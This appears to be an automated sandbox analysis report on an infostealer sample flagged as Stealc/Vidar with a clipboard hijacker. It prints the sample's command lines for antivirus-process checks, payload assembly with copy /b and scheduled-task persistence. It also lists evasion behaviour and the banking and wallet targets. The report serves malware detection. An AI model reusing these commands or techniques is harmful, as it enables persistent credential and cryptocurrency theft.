Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BE8B75 push ecx; ret 11_2_00BE8B88
Source: C:\ProgramData\KFCFBFHIEB.exe Code function: 22_2_006D50A5 push ebp; ret 22_2_00721C57

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Jump to dropped file
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\l3[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\ProgramData\KFCFBFHIEB.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\KFCFBFHIEB.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\KFCFBFHIEB.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\ProgramData\KFCFBFHIEB.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C459B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 11_2_00C459B3
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BD5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 11_2_00BD5EDA
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BE33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 11_2_00BE33B7
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\ProgramData\KFCFBFHIEB.exe API/Special instruction interceptor: Address: 5DAFBF
Source: C:\ProgramData\KFCFBFHIEB.exe API/Special instruction interceptor: Address: 761C29
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe API/Special instruction interceptor: Address: 5DAFBF
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe API/Special instruction interceptor: Address: 761C29
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Window / User API: threadDelayed 3748 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Window / User API: threadDelayed 6247 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif API coverage: 3.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 4304 Thread sleep count: 3748 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 4304 Thread sleep time: -843300s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 4304 Thread sleep count: 6247 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 4304 Thread sleep time: -1405575s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C24005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_00C24005
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_00C2C2FF
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2494A GetFileAttributesW,FindFirstFileW,FindClose, 11_2_00C2494A
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 11_2_00C2CD9F
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2CD14 FindFirstFileW,FindClose, 11_2_00C2CD14
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_00C2F5D8
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_00C2F735
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C2FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_00C2FA36
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C23CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_00C23CE2
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BD5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_00BD5D13
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\627982 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\627982\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: FCGIJKJJ.11.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: FCGIJKJJ.11.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: FCGIJKJJ.11.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: FCGIJKJJ.11.dr Binary or memory string: discord.comVMware20,11696487552f
Source: FCGIJKJJ.11.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: FCGIJKJJ.11.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B3F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: FCGIJKJJ.11.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: FCGIJKJJ.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: FCGIJKJJ.11.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: FCGIJKJJ.11.dr Binary or memory string: global block list test formVMware20,11696487552
Source: FCGIJKJJ.11.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: FCGIJKJJ.11.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: FCGIJKJJ.11.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: FCGIJKJJ.11.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: FCGIJKJJ.11.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: FCGIJKJJ.11.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: FCGIJKJJ.11.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B3F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: FCGIJKJJ.11.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: FCGIJKJJ.11.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: FCGIJKJJ.11.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: FCGIJKJJ.11.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: FCGIJKJJ.11.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: FCGIJKJJ.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Pct.pif, 0000000B.00000002.3806641933.0000000001ACF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: FCGIJKJJ.11.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: FCGIJKJJ.11.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: FCGIJKJJ.11.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: FCGIJKJJ.11.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: FCGIJKJJ.11.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: FCGIJKJJ.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: FCGIJKJJ.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: FCGIJKJJ.11.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Process information queried: ProcessInformation Jump to behavior
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C345D5 BlockInput, 11_2_00C345D5
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BD5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 11_2_00BD5240
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BF5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 11_2_00BF5CAC
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C188CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 11_2_00C188CD
Enables debug privileges
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BEA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00BEA385
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BEA354 SetUnhandledExceptionFilter, 11_2_00BEA354
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: Pct.pif PID: 6312, type: MEMORYSTR
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C19369 LogonUserW, 11_2_00C19369
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BD5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 11_2_00BD5240
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C21AC6 SendInput,keybd_event, 11_2_00C21AC6
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C251E2 mouse_event, 11_2_00C251E2
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tag Tag.bat & Tag.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 627982 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VoipBiographiesScholarPorno" Dis Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Omissions + ..\Involve + ..\Retro + ..\Official + ..\Network + ..\Unlike + ..\Relates K Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Pct.pif K Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\KFCFBFHIEB.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\KFCFBFHIEB.exe "C:\ProgramData\KFCFBFHIEB.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C188CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 11_2_00C188CD
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C24F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 11_2_00C24F1C
Source: file.exe, 00000000.00000003.2198637480.00000000028EE000.00000004.00000020.00020000.00000000.sdmp, Pct.pif, 0000000B.00000000.2246871769.0000000000C76000.00000002.00000001.01000000.00000006.sdmp, Cake.0.dr, Pct.pif.2.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Pct.pif Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BE885B cpuid 11_2_00BE885B
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C00030 GetLocalTime,__swprintf, 11_2_00C00030
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00C00722 GetUserNameW, 11_2_00C00722
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif Code function: 11_2_00BF416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 11_2_00BF416A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406805

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 25.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.KFCFBFHIEB.exe.400000.0.unpack, type: UNPACKEDPE
Yara detected Stealc
Source: Yara match File source: 11.3.Pct.pif.1b79858.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Pct.pif.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Pct.pif.1a82888.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Pct.pif.1a82888.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.3807123175.0000000001BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3594009510.0000000001EB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3593733373.0000000001C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3594534889.0000000001B2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3806737898.0000000001AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3594226622.0000000001B2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3594226622.0000000001B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3593810174.0000000001B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3594181599.0000000001AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3804413256.00000000001E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3593856204.0000000001B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3593733373.0000000001BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Pct.pif PID: 6312, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: Pct.pif PID: 6312, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: Electrum
